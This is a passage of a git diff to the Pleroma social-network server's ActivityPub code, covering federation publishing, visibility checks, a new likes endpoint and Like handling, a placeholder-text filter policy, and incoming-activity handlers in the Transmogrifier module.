	data = Transmogrifier.maybe_fix_user_object(data)

	user_data = %{
	ap_id: data["id"],
	info: %{
	"ap_enabled" => true,
	"source_data" => data,
	"banner" => banner,
	"locked" => locked
	},
	avatar: avatar,
	name: data["name"],
	follower_address: data["followers"],
	bio: data["summary"]
	}

	# nickname can be nil because of virtual actors
	user_data =
	if data["preferredUsername"] do
	Map.put(
	user_data,
	:nickname,
	"#{data["preferredUsername"]}@#{URI.parse(data["id"]).host}"
	)
	else
	Map.put(user_data, :nickname, nil)
	end

	{:ok, user_data}
	end

	def fetch_and_prepare_user_from_ap_id(ap_id) do
	with {:ok, data} <- fetch_and_contain_remote_object_from_id(ap_id) do
	user_data_from_user_object(data)
	else
	e -> Logger.error("Could not decode user at fetch #{ap_id}, #{inspect(e)}")
	end
	end

	def make_user_from_ap_id(ap_id) do
	if _user = User.get_by_ap_id(ap_id) do
	Transmogrifier.upgrade_user_from_ap_id(ap_id)
	else
	with {:ok, data} <- fetch_and_prepare_user_from_ap_id(ap_id) do
	User.insert_or_update_user(data)
	else
	e -> {:error, e}
	end
	end
	end

	def make_user_from_nickname(nickname) do
	with {:ok, %{"ap_id" => ap_id}} when not is_nil(ap_id) <- WebFinger.finger(nickname) do
	make_user_from_ap_id(ap_id)
	else
	_e -> {:error, "No AP id in WebFinger"}
	end
	end

	def should_federate?(inbox, public) do
	if public do
	true
	else
	inbox_info = URI.parse(inbox)
	!Enum.member?(Pleroma.Config.get([:instance, :quarantined_instances], []), inbox_info.host)
	end
	end

	def publish(actor, activity) do
	followers =
	if actor.follower_address in activity.recipients do
	{:ok, followers} = User.get_followers(actor)
	followers \|> Enum.filter(&(!&1.local))
	else
	[]
	end

	public = is_public?(activity)

	remote_inboxes =
	(Pleroma.Web.Salmon.remote_users(activity) ++ followers)
	\|> Enum.filter(fn user -> User.ap_enabled?(user) end)
	\|> Enum.map(fn %{info: %{source_data: data}} ->
	(is_map(data["endpoints"]) && Map.get(data["endpoints"], "sharedInbox")) \|\| data["inbox"]
	end)
	\|> Enum.uniq()
	\|> Enum.filter(fn inbox -> should_federate?(inbox, public) end)

	{:ok, data} = Transmogrifier.prepare_outgoing(activity.data)
	json = Jason.encode!(data)

	Enum.each(remote_inboxes, fn inbox ->
	Federator.enqueue(:publish_single_ap, %{
	inbox: inbox,
	json: json,
	actor: actor,
	id: activity.data["id"]
	})
	end)
	end

	def publish_one(%{inbox: inbox, json: json, actor: actor, id: id}) do
	Logger.info("Federating #{id} to #{inbox}")
	host = URI.parse(inbox).host

	digest = "SHA-256=" <> (:crypto.hash(:sha256, json) \|> Base.encode64())

	signature =
	Pleroma.Web.HTTPSignatures.sign(actor, %{
	host: host,
	"content-length": byte_size(json),
	digest: digest
	})

	@httpoison.post(
	inbox,
	json,
	[
	{"Content-Type", "application/activity+json"},
	{"signature", signature},
	{"digest", digest}
	]
	)
	end

	# TODO:
	# This will create a Create activity, which we need internally at the moment.
	def fetch_object_from_id(id) do
	if object = Object.get_cached_by_ap_id(id) do
	{:ok, object}
	else
	Logger.info("Fetching #{id} via AP")

	with {:ok, data} <- fetch_and_contain_remote_object_from_id(id),
	nil <- Object.normalize(data),
	params <- %{
	"type" => "Create",
	"to" => data["to"],
	"cc" => data["cc"],
	"actor" => data["actor"] \|\| data["attributedTo"],
	"object" => data
	},
	:ok <- Transmogrifier.contain_origin(id, params),
	{:ok, activity} <- Transmogrifier.handle_incoming(params) do
	{:ok, Object.normalize(activity.data["object"])}
	else
	{:error, {:reject, nil}} ->
	{:reject, nil}

	object = %Object{} ->
	{:ok, object}

	_e ->
	Logger.info("Couldn't get object via AP, trying out OStatus fetching...")

	case OStatus.fetch_activity_from_url(id) do
	{:ok, [activity \| _]} -> {:ok, Object.normalize(activity.data["object"])}
	e -> e
	end
	end
	end
	end

	def fetch_and_contain_remote_object_from_id(id) do
	Logger.info("Fetching #{id} via AP")

	with true <- String.starts_with?(id, "http"),
	{:ok, %{body: body, status: code}} when code in 200..299 <-
	@httpoison.get(
	id,
	[{:Accept, "application/activity+json"}]
	),
	{:ok, data} <- Jason.decode(body),
	:ok <- Transmogrifier.contain_origin_from_id(id, data) do
	{:ok, data}
	else
	e ->
	{:error, e}
	end
	end

	def is_public?(%Object{data: %{"type" => "Tombstone"}}) do
	false
	end

	def is_public?(activity) do
	"https://www.w3.org/ns/activitystreams#Public" in (activity.data["to"] ++
	(activity.data["cc"] \|\| []))
	end

	def visible_for_user?(activity, nil) do
	is_public?(activity)
	end

	def visible_for_user?(activity, user) do
	x = [user.ap_id \| user.following]
	y = activity.data["to"] ++ (activity.data["cc"] \|\| [])
	visible_for_user?(activity, nil) \|\| Enum.any?(x, &(&1 in y))
	end

	# guard
	def entire_thread_visible_for_user?(nil, _user), do: false

	# child
	def entire_thread_visible_for_user?(
	%Activity{data: %{"object" => %{"inReplyTo" => parent_id}}} = tail,
	user
	)
	when is_binary(parent_id) do
	parent = Activity.get_in_reply_to_activity(tail)
	visible_for_user?(tail, user) && entire_thread_visible_for_user?(parent, user)
	end

	# root
	def entire_thread_visible_for_user?(tail, user), do: visible_for_user?(tail, user)

	# filter out broken threads
	def contain_broken_threads(%Activity{} = activity, %User{} = user) do
	entire_thread_visible_for_user?(activity, user)
	end

	# do post-processing on a specific activity
	def contain_activity(%Activity{} = activity, %User{} = user) do
	contain_broken_threads(activity, user)
	end

	# do post-processing on a timeline
	def contain_timeline(timeline, user) do
	timeline
	\|> Enum.filter(fn activity ->
	contain_activity(activity, user)
	end)
	end
	end
	diff --git a/lib/pleroma/web/activity_pub/activity_pub_controller.ex b/lib/pleroma/web/activity_pub/activity_pub_controller.ex
	index 73ca07e84..7eed0a600 100644
	--- a/lib/pleroma/web/activity_pub/activity_pub_controller.ex
	+++ b/lib/pleroma/web/activity_pub/activity_pub_controller.ex
	@@ -1,253 +1,292 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2019 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.Web.ActivityPub.ActivityPubController do
	use Pleroma.Web, :controller
	alias Pleroma.{Activity, User, Object}
	alias Pleroma.Web.ActivityPub.{ObjectView, UserView}
	alias Pleroma.Web.ActivityPub.ActivityPub
	alias Pleroma.Web.ActivityPub.Relay
	alias Pleroma.Web.ActivityPub.Utils
	alias Pleroma.Web.ActivityPub.Transmogrifier
	alias Pleroma.Web.Federator

	require Logger

	action_fallback(:errors)

	plug(Pleroma.Web.FederatingPlug when action in [:inbox, :relay])
	plug(:relay_active? when action in [:relay])

	def relay_active?(conn, _) do
	if Keyword.get(Application.get_env(:pleroma, :instance), :allow_relay) do
	conn
	else
	conn
	\|> put_status(404)
	\|> json(%{error: "not found"})
	\|> halt
	end
	end

	def user(conn, %{"nickname" => nickname}) do
	with %User{} = user <- User.get_cached_by_nickname(nickname),
	{:ok, user} <- Pleroma.Web.WebFinger.ensure_keys_present(user) do
	conn
	\|> put_resp_header("content-type", "application/activity+json")
	\|> json(UserView.render("user.json", %{user: user}))
	else
	nil -> {:error, :not_found}
	end
	end

	def object(conn, %{"uuid" => uuid}) do
	with ap_id <- o_status_url(conn, :object, uuid),
	%Object{} = object <- Object.get_cached_by_ap_id(ap_id),
	{_, true} <- {:public?, ActivityPub.is_public?(object)} do
	conn
	\|> put_resp_header("content-type", "application/activity+json")
	\|> json(ObjectView.render("object.json", %{object: object}))
	else
	{:public?, false} ->
	{:error, :not_found}
	end
	end

	+ def object_likes(conn, %{"uuid" => uuid, "page" => page}) do
	+ with ap_id <- o_status_url(conn, :object, uuid),
	+ %Object{} = object <- Object.get_cached_by_ap_id(ap_id),
	+ {_, true} <- {:public?, ActivityPub.is_public?(object)},
	+ likes <- Utils.get_object_likes(object) do
	+ {page, _} = Integer.parse(page)
	+
	+ conn
	+ \|> put_resp_header("content-type", "application/activity+json")
	+ \|> json(ObjectView.render("likes.json", ap_id, likes, page))
	+ else
	+ {:public?, false} ->
	+ {:error, :not_found}
	+ end
	+ end
	+
	+ def object_likes(conn, %{"uuid" => uuid}) do
	+ with ap_id <- o_status_url(conn, :object, uuid),
	+ %Object{} = object <- Object.get_cached_by_ap_id(ap_id),
	+ {_, true} <- {:public?, ActivityPub.is_public?(object)},
	+ likes <- Utils.get_object_likes(object) do
	+ conn
	+ \|> put_resp_header("content-type", "application/activity+json")
	+ \|> json(ObjectView.render("likes.json", ap_id, likes))
	+ else
	+ {:public?, false} ->
	+ {:error, :not_found}
	+ end
	+ end
	+
	def activity(conn, %{"uuid" => uuid}) do
	with ap_id <- o_status_url(conn, :activity, uuid),
	%Activity{} = activity <- Activity.normalize(ap_id),
	{_, true} <- {:public?, ActivityPub.is_public?(activity)} do
	conn
	\|> put_resp_header("content-type", "application/activity+json")
	\|> json(ObjectView.render("object.json", %{object: activity}))
	else
	{:public?, false} ->
	{:error, :not_found}
	end
	end

	def following(conn, %{"nickname" => nickname, "page" => page}) do
	with %User{} = user <- User.get_cached_by_nickname(nickname),
	{:ok, user} <- Pleroma.Web.WebFinger.ensure_keys_present(user) do
	{page, _} = Integer.parse(page)

	conn
	\|> put_resp_header("content-type", "application/activity+json")
	\|> json(UserView.render("following.json", %{user: user, page: page}))
	end
	end

	def following(conn, %{"nickname" => nickname}) do
	with %User{} = user <- User.get_cached_by_nickname(nickname),
	{:ok, user} <- Pleroma.Web.WebFinger.ensure_keys_present(user) do
	conn
	\|> put_resp_header("content-type", "application/activity+json")
	\|> json(UserView.render("following.json", %{user: user}))
	end
	end

	def followers(conn, %{"nickname" => nickname, "page" => page}) do
	with %User{} = user <- User.get_cached_by_nickname(nickname),
	{:ok, user} <- Pleroma.Web.WebFinger.ensure_keys_present(user) do
	{page, _} = Integer.parse(page)

	conn
	\|> put_resp_header("content-type", "application/activity+json")
	\|> json(UserView.render("followers.json", %{user: user, page: page}))
	end
	end

	def followers(conn, %{"nickname" => nickname}) do
	with %User{} = user <- User.get_cached_by_nickname(nickname),
	{:ok, user} <- Pleroma.Web.WebFinger.ensure_keys_present(user) do
	conn
	\|> put_resp_header("content-type", "application/activity+json")
	\|> json(UserView.render("followers.json", %{user: user}))
	end
	end

	def outbox(conn, %{"nickname" => nickname} = params) do
	with %User{} = user <- User.get_cached_by_nickname(nickname),
	{:ok, user} <- Pleroma.Web.WebFinger.ensure_keys_present(user) do
	conn
	\|> put_resp_header("content-type", "application/activity+json")
	\|> json(UserView.render("outbox.json", %{user: user, max_id: params["max_id"]}))
	end
	end

	def inbox(%{assigns: %{valid_signature: true}} = conn, %{"nickname" => nickname} = params) do
	with %User{} = user <- User.get_cached_by_nickname(nickname),
	true <- Utils.recipient_in_message(user.ap_id, params),
	params <- Utils.maybe_splice_recipient(user.ap_id, params) do
	Federator.enqueue(:incoming_ap_doc, params)
	json(conn, "ok")
	end
	end

	def inbox(%{assigns: %{valid_signature: true}} = conn, params) do
	Federator.enqueue(:incoming_ap_doc, params)
	json(conn, "ok")
	end

	# only accept relayed Creates
	def inbox(conn, %{"type" => "Create"} = params) do
	Logger.info(
	"Signature missing or not from author, relayed Create message, fetching object from source"
	)

	ActivityPub.fetch_object_from_id(params["object"]["id"])

	json(conn, "ok")
	end

	def inbox(conn, params) do
	headers = Enum.into(conn.req_headers, %{})

	if String.contains?(headers["signature"], params["actor"]) do
	Logger.info(
	"Signature validation error for: #{params["actor"]}, make sure you are forwarding the HTTP Host header!"
	)

	Logger.info(inspect(conn.req_headers))
	end

	json(conn, "error")
	end

	def relay(conn, _params) do
	with %User{} = user <- Relay.get_actor(),
	{:ok, user} <- Pleroma.Web.WebFinger.ensure_keys_present(user) do
	conn
	\|> put_resp_header("content-type", "application/activity+json")
	\|> json(UserView.render("user.json", %{user: user}))
	else
	nil -> {:error, :not_found}
	end
	end

	def read_inbox(%{assigns: %{user: user}} = conn, %{"nickname" => nickname} = params) do
	if nickname == user.nickname do
	conn
	\|> put_resp_header("content-type", "application/activity+json")
	\|> json(UserView.render("inbox.json", %{user: user, max_id: params["max_id"]}))
	else
	conn
	\|> put_status(:forbidden)
	\|> json("can't read inbox of #{nickname} as #{user.nickname}")
	end
	end

	def handle_user_activity(user, %{"type" => "Create"} = params) do
	object =
	params["object"]
	\|> Map.merge(Map.take(params, ["to", "cc"]))
	\|> Map.put("attributedTo", user.ap_id())
	\|> Transmogrifier.fix_object()

	ActivityPub.create(%{
	to: params["to"],
	actor: user,
	context: object["context"],
	object: object,
	additional: Map.take(params, ["cc"])
	})
	end

	def handle_user_activity(user, %{"type" => "Delete"} = params) do
	with %Object{} = object <- Object.normalize(params["object"]),
	true <- user.info.is_moderator \|\| user.ap_id == object.data["actor"],
	{:ok, delete} <- ActivityPub.delete(object) do
	{:ok, delete}
	else
	_ -> {:error, "Can't delete object"}
	end
	end

	+ def handle_user_activity(user, %{"type" => "Like"} = params) do
	+ with %Object{} = object <- Object.normalize(params["object"]),
	+ {:ok, activity, _object} <- ActivityPub.like(user, object) do
	+ {:ok, activity}
	+ else
	+ _ -> {:error, "Can't like object"}
	+ end
	+ end
	+
	def handle_user_activity(_, _) do
	{:error, "Unhandled activity type"}
	end

	def update_outbox(
	%{assigns: %{user: user}} = conn,
	%{"nickname" => nickname} = params
	) do
	if nickname == user.nickname do
	actor = user.ap_id()

	params =
	params
	\|> Map.drop(["id"])
	\|> Map.put("actor", actor)
	\|> Transmogrifier.fix_addressing()

	with {:ok, %Activity{} = activity} <- handle_user_activity(user, params) do
	conn
	\|> put_status(:created)
	\|> put_resp_header("location", activity.data["id"])
	\|> json(activity.data)
	else
	{:error, message} ->
	conn
	\|> put_status(:bad_request)
	\|> json(message)
	end
	else
	conn
	\|> put_status(:forbidden)
	\|> json("can't update outbox of #{nickname} as #{user.nickname}")
	end
	end

	def errors(conn, {:error, :not_found}) do
	conn
	\|> put_status(404)
	\|> json("Not found")
	end

	def errors(conn, _e) do
	conn
	\|> put_status(500)
	\|> json("error")
	end
	end
	diff --git a/lib/pleroma/web/activity_pub/mrf/no_placeholder_text_policy.ex b/lib/pleroma/web/activity_pub/mrf/no_placeholder_text_policy.ex
	new file mode 100644
	index 000000000..081456046
	--- /dev/null
	+++ b/lib/pleroma/web/activity_pub/mrf/no_placeholder_text_policy.ex
	@@ -0,0 +1,29 @@
	+# Pleroma: A lightweight social networking server
	+# Copyright © 2019 Pleroma Authors <https://pleroma.social/>
	+# SPDX-License-Identifier: AGPL-3.0-only
	+
	+defmodule Pleroma.Web.ActivityPub.MRF.NoPlaceholderTextPolicy do
	+ @behaviour Pleroma.Web.ActivityPub.MRF
	+
	+ @impl true
	+ def filter(
	+ %{
	+ "type" => "Create",
	+ "object" => %{"content" => content, "attachment" => _attachment} = child_object
	+ } = object
	+ )
	+ when content in [".", "<p>.</p>"] do
	+ child_object =
	+ child_object
	+ \|> Map.put("content", "")
	+
	+ object =
	+ object
	+ \|> Map.put("object", child_object)
	+
	+ {:ok, object}
	+ end
	+
	+ @impl true
	+ def filter(object), do: {:ok, object}
	+end
	diff --git a/lib/pleroma/web/activity_pub/transmogrifier.ex b/lib/pleroma/web/activity_pub/transmogrifier.ex
	index 87b7fc07f..86d11c874 100644
	--- a/lib/pleroma/web/activity_pub/transmogrifier.ex
	+++ b/lib/pleroma/web/activity_pub/transmogrifier.ex
	@@ -1,926 +1,942 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2019 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.Web.ActivityPub.Transmogrifier do
	@moduledoc """
	A module to handle coding from internal to wire ActivityPub and back.
	"""
	alias Pleroma.User
	alias Pleroma.Object
	alias Pleroma.Activity
	alias Pleroma.Repo
	alias Pleroma.Web.ActivityPub.ActivityPub
	alias Pleroma.Web.ActivityPub.Utils

	import Ecto.Query

	require Logger

	def get_actor(%{"actor" => actor}) when is_binary(actor) do
	actor
	end

	def get_actor(%{"actor" => actor}) when is_list(actor) do
	if is_binary(Enum.at(actor, 0)) do
	Enum.at(actor, 0)
	else
	Enum.find(actor, fn %{"type" => type} -> type in ["Person", "Service", "Application"] end)
	\|> Map.get("id")
	end
	end

	def get_actor(%{"actor" => %{"id" => id}}) when is_bitstring(id) do
	id
	end

	def get_actor(%{"actor" => nil, "attributedTo" => actor}) when not is_nil(actor) do
	get_actor(%{"actor" => actor})
	end

	@doc """
	Checks that an imported AP object's actor matches the domain it came from.
	"""
	def contain_origin(_id, %{"actor" => nil}), do: :error

	def contain_origin(id, %{"actor" => _actor} = params) do
	id_uri = URI.parse(id)
	actor_uri = URI.parse(get_actor(params))

	if id_uri.host == actor_uri.host do
	:ok
	else
	:error
	end
	end

	def contain_origin_from_id(_id, %{"id" => nil}), do: :error

	def contain_origin_from_id(id, %{"id" => other_id} = _params) do
	id_uri = URI.parse(id)
	other_uri = URI.parse(other_id)

	if id_uri.host == other_uri.host do
	:ok
	else
	:error
	end
	end

	@doc """
	Modifies an incoming AP object (mastodon format) to our internal format.
	"""
	def fix_object(object) do
	object
	\|> fix_actor
	\|> fix_url
	\|> fix_attachments
	\|> fix_context
	\|> fix_in_reply_to
	\|> fix_emoji
	\|> fix_tag
	\|> fix_content_map
	\|> fix_likes
	\|> fix_addressing
	end

	def fix_addressing_list(map, field) do
	if is_binary(map[field]) do
	map
	\|> Map.put(field, [map[field]])
	else
	map
	end
	end

	def fix_addressing(map) do
	map
	\|> fix_addressing_list("to")
	\|> fix_addressing_list("cc")
	\|> fix_addressing_list("bto")
	\|> fix_addressing_list("bcc")
	end

	def fix_actor(%{"attributedTo" => actor} = object) do
	object
	\|> Map.put("actor", get_actor(%{"actor" => actor}))
	end

	def fix_likes(%{"likes" => likes} = object)
	when is_bitstring(likes) do
	# Check for standardisation
	# This is what Peertube does
	# curl -H 'Accept: application/activity+json' $likes \| jq .totalItems
	object
	\|> Map.put("likes", [])
	\|> Map.put("like_count", 0)
	end

	def fix_likes(object) do
	object
	end

	def fix_in_reply_to(%{"inReplyTo" => in_reply_to} = object)
	when not is_nil(in_reply_to) do
	in_reply_to_id =
	cond do
	is_bitstring(in_reply_to) ->
	in_reply_to

	is_map(in_reply_to) && is_bitstring(in_reply_to["id"]) ->
	in_reply_to["id"]

	is_list(in_reply_to) && is_bitstring(Enum.at(in_reply_to, 0)) ->
	Enum.at(in_reply_to, 0)

	# Maybe I should output an error too?
	true ->
	""
	end

	case fetch_obj_helper(in_reply_to_id) do
	{:ok, replied_object} ->
	with %Activity{} = activity <-
	Activity.get_create_activity_by_object_ap_id(replied_object.data["id"]) do
	object
	\|> Map.put("inReplyTo", replied_object.data["id"])
	\|> Map.put("inReplyToAtomUri", object["inReplyToAtomUri"] \|\| in_reply_to_id)
	\|> Map.put("inReplyToStatusId", activity.id)
	\|> Map.put("conversation", replied_object.data["context"] \|\| object["conversation"])
	\|> Map.put("context", replied_object.data["context"] \|\| object["conversation"])
	else
	e ->
	Logger.error("Couldn't fetch \"#{inspect(in_reply_to_id)}\", error: #{inspect(e)}")
	object
	end

	e ->
	Logger.error("Couldn't fetch \"#{inspect(in_reply_to_id)}\", error: #{inspect(e)}")
	object
	end
	end

	def fix_in_reply_to(object), do: object

	def fix_context(object) do
	context = object["context"] \|\| object["conversation"] \|\| Utils.generate_context_id()

	object
	\|> Map.put("context", context)
	\|> Map.put("conversation", context)
	end

	def fix_attachments(%{"attachment" => attachment} = object) when is_list(attachment) do
	attachments =
	attachment
	\|> Enum.map(fn data ->
	media_type = data["mediaType"] \|\| data["mimeType"]
	href = data["url"] \|\| data["href"]

	url = [%{"type" => "Link", "mediaType" => media_type, "href" => href}]

	data
	\|> Map.put("mediaType", media_type)
	\|> Map.put("url", url)
	end)

	object
	\|> Map.put("attachment", attachments)
	end

	def fix_attachments(%{"attachment" => attachment} = object) when is_map(attachment) do
	Map.put(object, "attachment", [attachment])
	\|> fix_attachments()
	end

	def fix_attachments(object), do: object

	def fix_url(%{"url" => url} = object) when is_map(url) do
	object
	\|> Map.put("url", url["href"])
	end

	def fix_url(%{"type" => "Video", "url" => url} = object) when is_list(url) do
	first_element = Enum.at(url, 0)

	link_element =
	url
	\|> Enum.filter(fn x -> is_map(x) end)
	\|> Enum.filter(fn x -> x["mimeType"] == "text/html" end)
	\|> Enum.at(0)

	object
	\|> Map.put("attachment", [first_element])
	\|> Map.put("url", link_element["href"])
	end

	def fix_url(%{"type" => object_type, "url" => url} = object)
	when object_type != "Video" and is_list(url) do
	first_element = Enum.at(url, 0)

	url_string =
	cond do
	is_bitstring(first_element) -> first_element
	is_map(first_element) -> first_element["href"] \|\| ""
	true -> ""
	end

	object
	\|> Map.put("url", url_string)
	end

	def fix_url(object), do: object

	def fix_emoji(%{"tag" => tags} = object) when is_list(tags) do
	emoji = tags \|> Enum.filter(fn data -> data["type"] == "Emoji" and data["icon"] end)

	emoji =
	emoji
	\|> Enum.reduce(%{}, fn data, mapping ->
	name = String.trim(data["name"], ":")

	mapping \|> Map.put(name, data["icon"]["url"])
	end)

	# we merge mastodon and pleroma emoji into a single mapping, to allow for both wire formats
	emoji = Map.merge(object["emoji"] \|\| %{}, emoji)

	object
	\|> Map.put("emoji", emoji)
	end

	def fix_emoji(%{"tag" => %{"type" => "Emoji"} = tag} = object) do
	name = String.trim(tag["name"], ":")
	emoji = %{name => tag["icon"]["url"]}

	object
	\|> Map.put("emoji", emoji)
	end

	def fix_emoji(object), do: object

	def fix_tag(%{"tag" => tag} = object) when is_list(tag) do
	tags =
	tag
	\|> Enum.filter(fn data -> data["type"] == "Hashtag" and data["name"] end)
	\|> Enum.map(fn data -> String.slice(data["name"], 1..-1) end)

	combined = tag ++ tags

	object
	\|> Map.put("tag", combined)
	end

	def fix_tag(%{"tag" => %{"type" => "Hashtag", "name" => hashtag} = tag} = object) do
	combined = [tag, String.slice(hashtag, 1..-1)]

	object
	\|> Map.put("tag", combined)
	end

	def fix_tag(object), do: object

	# content map usually only has one language so this will do for now.
	def fix_content_map(%{"contentMap" => content_map} = object) do
	content_groups = Map.to_list(content_map)
	{_, content} = Enum.at(content_groups, 0)

	object
	\|> Map.put("content", content)
	end

	def fix_content_map(object), do: object

	defp mastodon_follow_hack(%{"id" => id, "actor" => follower_id}, followed) do
	with true <- id =~ "follows",
	%User{local: true} = follower <- User.get_cached_by_ap_id(follower_id),
	%Activity{} = activity <- Utils.fetch_latest_follow(follower, followed) do
	{:ok, activity}
	else
	_ -> {:error, nil}
	end
	end

	defp mastodon_follow_hack(_, _), do: {:error, nil}

	defp get_follow_activity(follow_object, followed) do
	with object_id when not is_nil(object_id) <- Utils.get_ap_id(follow_object),
	{_, %Activity{} = activity} <- {:activity, Activity.get_by_ap_id(object_id)} do
	{:ok, activity}
	else
	# Can't find the activity. This might a Mastodon 2.3 "Accept"
	{:activity, nil} ->
	mastodon_follow_hack(follow_object, followed)

	_ ->
	{:error, nil}
	end
	end

	# disallow objects with bogus IDs
	def handle_incoming(%{"id" => nil}), do: :error
	def handle_incoming(%{"id" => ""}), do: :error
	# length of https:// = 8, should validate better, but good enough for now.
	def handle_incoming(%{"id" => id}) when not (is_binary(id) and length(id) > 8), do: :error

	# TODO: validate those with a Ecto scheme
	# - tags
	# - emoji
	def handle_incoming(%{"type" => "Create", "object" => %{"type" => objtype} = object} = data)
	when objtype in ["Article", "Note", "Video", "Page"] do
	actor = get_actor(data)

	data =
	Map.put(data, "actor", actor)
	\|> fix_addressing

	with nil <- Activity.get_create_activity_by_object_ap_id(object["id"]),
	%User{} = user <- User.get_or_fetch_by_ap_id(data["actor"]) do
	object = fix_object(data["object"])

	params = %{
	to: data["to"],
	object: object,
	actor: user,
	context: object["conversation"],
	local: false,
	published: data["published"],
	additional:
	Map.take(data, [
	"cc",
	"id"
	])
	}

	ActivityPub.create(params)
	else
	%Activity{} = activity -> {:ok, activity}
	_e -> :error
	end
	end

	def handle_incoming(
	%{"type" => "Follow", "object" => followed, "actor" => follower, "id" => id} = data
	) do
	with %User{local: true} = followed <- User.get_cached_by_ap_id(followed),
	%User{} = follower <- User.get_or_fetch_by_ap_id(follower),
	{:ok, activity} <- ActivityPub.follow(follower, followed, id, false) do
	if not User.locked?(followed) do
	ActivityPub.accept(%{
	to: [follower.ap_id],
	actor: followed.ap_id,
	object: data,
	local: true
	})

	User.follow(follower, followed)
	end

	{:ok, activity}
	else
	_e -> :error
	end
	end

	def handle_incoming(
	%{"type" => "Accept", "object" => follow_object, "actor" => _actor, "id" => _id} = data
	) do
	with actor <- get_actor(data),
	%User{} = followed <- User.get_or_fetch_by_ap_id(actor),
	{:ok, follow_activity} <- get_follow_activity(follow_object, followed),
	{:ok, follow_activity} <- Utils.update_follow_state(follow_activity, "accept"),
	%User{local: true} = follower <- User.get_cached_by_ap_id(follow_activity.data["actor"]),
	{:ok, activity} <-
	ActivityPub.accept(%{
	to: follow_activity.data["to"],
	type: "Accept",
	actor: followed.ap_id,
	object: follow_activity.data["id"],
	local: false
	}) do
	if not User.following?(follower, followed) do
	{:ok, _follower} = User.follow(follower, followed)
	end

	{:ok, activity}
	else
	_e -> :error
	end
	end

	def handle_incoming(
	%{"type" => "Reject", "object" => follow_object, "actor" => _actor, "id" => _id} = data
	) do
	with actor <- get_actor(data),
	%User{} = followed <- User.get_or_fetch_by_ap_id(actor),
	{:ok, follow_activity} <- get_follow_activity(follow_object, followed),
	{:ok, follow_activity} <- Utils.update_follow_state(follow_activity, "reject"),
	%User{local: true} = follower <- User.get_cached_by_ap_id(follow_activity.data["actor"]),
	{:ok, activity} <-
	ActivityPub.accept(%{
	to: follow_activity.data["to"],
	type: "Accept",
	actor: followed.ap_id,
	object: follow_activity.data["id"],
	local: false
	}) do
	User.unfollow(follower, followed)

	{:ok, activity}
	else
	_e -> :error
	end
	end

	def handle_incoming(
	%{"type" => "Like", "object" => object_id, "actor" => _actor, "id" => id} = data
	) do
	with actor <- get_actor(data),
	%User{} = actor <- User.get_or_fetch_by_ap_id(actor),
	{:ok, object} <- get_obj_helper(object_id) \|\| fetch_obj_helper(object_id),
	{:ok, activity, _object} <- ActivityPub.like(actor, object, id, false) do
	{:ok, activity}
	else
	_e -> :error
	end
	end

	def handle_incoming(
	%{"type" => "Announce", "object" => object_id, "actor" => _actor, "id" => id} = data
	) do
	with actor <- get_actor(data),
	%User{} = actor <- User.get_or_fetch_by_ap_id(actor),
	{:ok, object} <- get_obj_helper(object_id) \|\| fetch_obj_helper(object_id),
	{:ok, activity, _object} <- ActivityPub.announce(actor, object, id, false) do
	{:ok, activity}
	else
	_e -> :error
	end
	end

	def handle_incoming(
	%{"type" => "Update", "object" => %{"type" => object_type} = object, "actor" => actor_id} =
	data
	)
	when object_type in ["Person", "Application", "Service", "Organization"] do
	with %User{ap_id: ^actor_id} = actor <- User.get_by_ap_id(object["id"]) do
	{:ok, new_user_data} = ActivityPub.user_data_from_user_object(object)

	banner = new_user_data[:info]["banner"]
	locked = new_user_data[:info]["locked"] \|\| false

	update_data =
	new_user_data
	\|> Map.take([:name, :bio, :avatar])
	\|> Map.put(:info, %{"banner" => banner, "locked" => locked})

	actor
	\|> User.upgrade_changeset(update_data)
	\|> User.update_and_set_cache()

	ActivityPub.update(%{
	local: false,
	to: data["to"] \|\| [],
	cc: data["cc"] \|\| [],
	object: object,
	actor: actor_id
	})
	else
	e ->
	Logger.error(e)
	:error
	end
	end

	# TODO: We presently assume that any actor on the same origin domain as the object being
	# deleted has the rights to delete that object. A better way to validate whether or not
	# the object should be deleted is to refetch the object URI, which should return either
	# an error or a tombstone. This would allow us to verify that a deletion actually took
	# place.
	def handle_incoming(
	%{"type" => "Delete", "object" => object_id, "actor" => _actor, "id" => _id} = data
	) do
	object_id = Utils.get_ap_id(object_id)

	with actor <- get_actor(data),
	%User{} = actor <- User.get_or_fetch_by_ap_id(actor),
	{:ok, object} <- get_obj_helper(object_id) \|\| fetch_obj_helper(object_id),
	:ok <- contain_origin(actor.ap_id, object.data),
	{:ok, activity} <- ActivityPub.delete(object, false) do
	{:ok, activity}
	else
	_e -> :error
	end
	end

	def handle_incoming(
	%{
	"type" => "Undo",
	"object" => %{"type" => "Announce", "object" => object_id},
	"actor" => _actor,
	"id" => id
	} = data
	) do
	with actor <- get_actor(data),
	%User{} = actor <- User.get_or_fetch_by_ap_id(actor),
	{:ok, object} <- get_obj_helper(object_id) \|\| fetch_obj_helper(object_id),
	{:ok, activity, _} <- ActivityPub.unannounce(actor, object, id, false) do
	{:ok, activity}
	else
	_e -> :error
	end
	end

	def handle_incoming(
	%{
	"type" => "Undo",
	"object" => %{"type" => "Follow", "object" => followed},
	"actor" => follower,
	"id" => id
	} = _data
	) do
	with %User{local: true} = followed <- User.get_cached_by_ap_id(followed),
	%User{} = follower <- User.get_or_fetch_by_ap_id(follower),
	{:ok, activity} <- ActivityPub.unfollow(follower, followed, id, false) do
	User.unfollow(follower, followed)
	{:ok, activity}
	else
	_e -> :error
	end
	end

	def handle_incoming(
	%{
	"type" => "Undo",
	"object" => %{"type" => "Block", "object" => blocked},
	"actor" => blocker,
	"id" => id
	} = _data
	) do
	with true <- Pleroma.Config.get([:activitypub, :accept_blocks]),
	%User{local: true} = blocked <- User.get_cached_by_ap_id(blocked),
	%User{} = blocker <- User.get_or_fetch_by_ap_id(blocker),
	{:ok, activity} <- ActivityPub.unblock(blocker, blocked, id, false) do
	User.unblock(blocker, blocked)
	{:ok, activity}
	else
	_e -> :error
	end
	end

	def handle_incoming(
	%{"type" => "Block", "object" => blocked, "actor" => blocker, "id" => id} = _data
	) do
	with true <- Pleroma.Config.get([:activitypub, :accept_blocks]),
	%User{local: true} = blocked = User.get_cached_by_ap_id(blocked),
	%User{} = blocker = User.get_or_fetch_by_ap_id(blocker),
